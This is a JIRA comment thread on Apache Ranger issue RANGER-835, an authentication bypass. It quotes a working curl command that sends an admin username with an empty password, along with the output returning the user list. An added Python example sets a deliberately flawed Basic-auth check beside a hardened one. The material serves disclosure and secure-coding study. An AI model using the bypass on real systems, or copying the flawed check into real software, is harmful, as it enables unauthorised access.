[
https://issues.apache.org/jira/browse/RANGER-835?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15140004#comment-15140004
]
Dilli Dorai Minnal Arumugam commented on RANGER-835:
----------------------------------------------------
Thanks [~bosco] for the links.
Reviewed http://www.apache.org/security/committers.html
Reading the following snippet on that page
"The log for the svn commit that applied the fix is updated to include the CVE
number. Projects that use git as their primary source code control system
should not do this as editing a pushed commit causes all sorts of problems."
indicates that the patch need not be hidden after the CVE is released.
In fact it encourages updating the commit message with CVE number and cautions
us not to do that for git repositories because git gets confused.
Considering that, I think it would be appropriate to include the commit id and
the patch here to allow the community (PPMCs, committers, contributors and users)
to review the patch.
> Authentication bypass in Ranger API
> -----------------------------------
>
> Key: RANGER-835
> URL: https://issues.apache.org/jira/browse/RANGER-835
> Project: Ranger
> Issue Type: Bug
> Components: Ranger
> Affects Versions: 0.5.0
> Reporter: Jim Halfpenny
> Priority: Critical
> Labels: authentication, security, vulnerability
> Fix For: 0.5.1, 0.6.0
>
>
> Authentication to the Ranger API can be trivially bypassed by sending a valid
> username along with a null password. API authentication appears to work
> correctly, rejecting requests if the password is incorrect but allows
> requests where no password has been sent.
> The example below uses curl to demonstrate this issue by retrieving a list of
> the users.
> $ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users
> * Trying 127.0.0.1...
> * Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
> * Server auth using Basic with user 'admin'
> > HEAD /service/xusers/users HTTP/1.1
> > Host: 127.0.0.1:6080
> > Authorization: Basic YWRtaW46
> > User-Agent: curl/7.43.0
> > Accept: */*
> >
> < HTTP/1.1 200 OK
> < Server: Apache-Coyote/1.1
> < Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
> < Content-Type: application/xml
> < Content-Length: 0
> < Date: Fri, 05 Feb 2016 11:41:16 GMT
> <
> <?xml version="1.0" encoding="UTF-8"
> standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
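Added example, not code from the Ranger project or from this thread: a hypothetical Basic-auth check that reproduces the behaviour the issue describes (a wrong password is rejected, an empty password is accepted) beside a hardened check that rejects empty credentials before any lookup or comparison. The user store, the password value and all function names are constructed for illustration; the decoded header value is the one shown in the report.

```python
import base64
import hmac
from typing import Optional, Tuple

# Constructed sample user store for the example (not Ranger's).
USERS = {"admin": "s3cret-example"}

def basic_header(user: str, password: str) -> str:
    """Build an HTTP Basic Authorization header value."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"

def parse_basic(header: str) -> Optional[Tuple[str, str]]:
    """Decode a Basic header into (user, password); None if malformed."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None

def authenticate_flawed(header: str) -> bool:
    """Hypothetical flawed check matching the reported behaviour: the
    password is compared only when one was sent, so a known username
    with an empty password falls through as authenticated."""
    creds = parse_basic(header)
    if creds is None or creds[0] not in USERS:
        return False
    user, password = creds
    if password and password != USERS[user]:
        return False
    return True

def authenticate_fixed(header: str) -> bool:
    """Hardened check: empty user or password is rejected before any
    lookup, and the comparison is constant-time."""
    creds = parse_basic(header)
    if creds is None:
        return False
    user, password = creds
    if not user or not password:
        return False
    expected = USERS.get(user)
    if expected is None:
        return False
    return hmac.compare_digest(password.encode(), expected.encode())
```

`Basic YWRtaW46` from the report decodes to `admin:` (empty password), which the flawed check accepts and the fixed check refuses.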